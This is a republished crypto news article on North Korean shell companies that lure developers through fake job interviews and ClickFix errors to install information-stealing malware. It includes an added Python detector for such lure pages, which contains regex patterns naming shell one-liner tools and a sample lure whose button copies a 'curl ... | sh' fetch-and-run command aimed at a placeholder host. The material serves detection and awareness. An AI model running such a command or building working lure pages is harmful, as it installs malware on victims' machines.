Source: Cointelegraph
Original: “North Korean hackers set up 3 shell companies to scam cryptocurrency developers”
A subgroup of the North Korea-linked Lazarus hacking organization has set up three shell companies, two of them registered in the United States, to spread malware to unsuspecting cryptocurrency developers.
According to an April 24 report by Silent Push threat analysts, the three fake cryptocurrency consulting companies (BlockNovas, Angeloper Agency, and SoftGlide) are used by the North Korean threat group tracked as Contagious Interview to distribute malware through fake job interviews.
Zach Edwards, a senior threat analyst at Silent Push, stated in a post on the X platform on April 24 that two of the shell companies are registered as legitimate businesses in the United States.
"These websites and numerous accounts on job recruitment sites are being used to lure people into applying for jobs," he said.
"During the job application process, when applicants attempt to record self-introduction videos, error messages will appear. The 'solution' is a simple click-fix and copy-paste operation, and if an unsuspecting developer completes this process, it will lead to a malware infection."
According to the Silent Push report, the hackers used three malware families: BeaverTail, InvisibleFerret, and OtterCookie.
BeaverTail is primarily an information stealer that also loads follow-on payloads. OtterCookie and InvisibleFerret mainly target sensitive data, including cryptocurrency wallet keys and clipboard contents.
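The lure Edwards describes is the ClickFix pattern: a fake error during the video step, a button that silently writes a command to the clipboard, and an instruction to paste the "fix" into a terminal or Run box. The following is an added example, not Silent Push's tooling and not code from the report: a small heuristic scanner that flags a page which both writes to the clipboard from inline script and carries a string literal that looks like a shell or PowerShell one-liner. The two sample pages are constructed for the demonstration, and the `example.invalid` host is a reserved placeholder, not real infrastructure.

```python
"""Heuristic detector for ClickFix-style 'copy this fix' lure pages.

Added example (not Silent Push's code). Scans inline <script> blocks for a
clipboard write whose payload looks like a command a victim is meant to paste.
"""
import re

# Ways page script can put text onto the user's clipboard.
CLIPBOARD_SINKS = re.compile(
    r"navigator\.clipboard\.writeText\s*\(|document\.execCommand\s*\(\s*['\"]copy['\"]"
)

# Fragments that look like a one-liner meant for a shell, a Run box or a terminal.
COMMAND_MARKERS = re.compile(
    r"(curl\s+-[A-Za-z]*s|wget\s+|powershell(\.exe)?\s+-|Invoke-Expression|\biex\s*\(|"
    r"\|\s*(ba)?sh\b|mshta\s+|cmd(\.exe)?\s*/c|bash\s+-c)",
    re.IGNORECASE,
)

# Pretext wording typical of the fake camera/video error step.
PRETEXT_MARKERS = re.compile(
    r"(camera|microphone|webcam|video|driver|codec).{0,80}(error|failed|not working)",
    re.IGNORECASE | re.DOTALL,
)


def extract_inline_scripts(html: str) -> list[str]:
    """Return the bodies of all inline <script> blocks."""
    return re.findall(r"<script[^>]*>(.*?)</script>", html, re.IGNORECASE | re.DOTALL)


def string_literals(js: str) -> list[str]:
    """Crude extraction of quoted literals; enough to find a pasted-command payload."""
    return [m.group(2) for m in re.finditer(r"""(['"`])(.*?)\1""", js, re.DOTALL)]


def score_page(html: str) -> dict:
    """Flag a page that both writes to the clipboard and has a command-looking literal."""
    findings = {"clipboard_sink": False, "command_in_literal": [], "pretext": False}
    for js in extract_inline_scripts(html):
        if CLIPBOARD_SINKS.search(js):
            findings["clipboard_sink"] = True
        for lit in string_literals(js):
            if COMMAND_MARKERS.search(lit):
                findings["command_in_literal"].append(lit.strip())
    findings["pretext"] = bool(PRETEXT_MARKERS.search(html))
    # A command literal alone could be documentation; a clipboard sink alone is a
    # share button. Both together, ideally with the error pretext, is the ClickFix shape.
    findings["verdict"] = (
        "clickfix-like"
        if findings["clipboard_sink"] and findings["command_in_literal"]
        else "benign"
    )
    return findings


# Constructed sample: a lure page whose "Fix it" button silently copies a command.
# The host is a reserved .invalid name, not real infrastructure.
LURE_PAGE = """
<html><body>
<p>Your camera driver returned an error. Click Fix it and paste the fix into your terminal.</p>
<button id="fix">Fix it</button>
<script>
document.getElementById("fix").onclick = function () {
  navigator.clipboard.writeText("curl -fsSL https://example.invalid/fix.sh | sh");
  alert("Fix copied. Press Ctrl+Alt+T, paste, and press Enter.");
};
</script>
</body></html>
"""

# Constructed sample: an ordinary share button that copies a link.
BENIGN_PAGE = """
<html><body>
<button id="share">Copy link</button>
<script>
document.getElementById("share").onclick = function () {
  navigator.clipboard.writeText("https://example.invalid/share/123");
};
</script>
</body></html>
"""

if __name__ == "__main__":
    for name, page in (("lure", LURE_PAGE), ("benign", BENIGN_PAGE)):
        print(name, score_page(page))
```

The heuristic deliberately requires both signals before it raises a verdict: legitimate "copy link" buttons use the same clipboard API, and real documentation pages contain `curl ... | sh` text without copying it anywhere. Real lures often build the command from concatenated fragments or hide it in a non-script element, so treat this as a triage aid for recruiter-sent links, not a complete detector.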
Silent Push analysts noted in the report that the hackers are searching for targets through GitHub, job recruitment sites, and freelance platforms.
The scam also involves creating employee profiles for the three shell companies using AI-generated images and photos stolen from real people.
"This network employs a large number of fake employees and images stolen from real people. We have documented some obvious fakes and stolen images, but it is important to recognize that the impersonation tactics in this operation are different," Edwards said.
"In one example, the threat actor obtained a photo of a real person and then seemingly created subtle variations of the same photo using AI image modification tools."
The campaign began in 2024, and Edwards said there have already been publicly reported victims.
Silent Push found that two developers became targets of the attack, one of whom reportedly had their MetaMask wallet compromised.
The Federal Bureau of Investigation has seized the domain of at least one of the companies.
"The FBI took over the domain of Blocknovas, but Softglide and some of their other infrastructure are still operational," Edwards said.
In March, at least three cryptocurrency founders reported that they thwarted attempts by suspected North Korean hackers to steal sensitive data through fake Zoom calls.
The Lazarus Group is the prime suspect in some of the largest cyber thefts in the Web3 space, including the $1.4 billion Bybit hack and the $600 million Ronin network hack.
Disclaimer: This article represents only the author's personal views and does not represent the position or views of this platform. It is provided for information sharing only and does not constitute investment advice to anyone. Any dispute between users and the author is unrelated to this platform. If an article or image published on this page infringes rights, please send proof of the rights and proof of identity to support@aicoin.com, and platform staff will review it.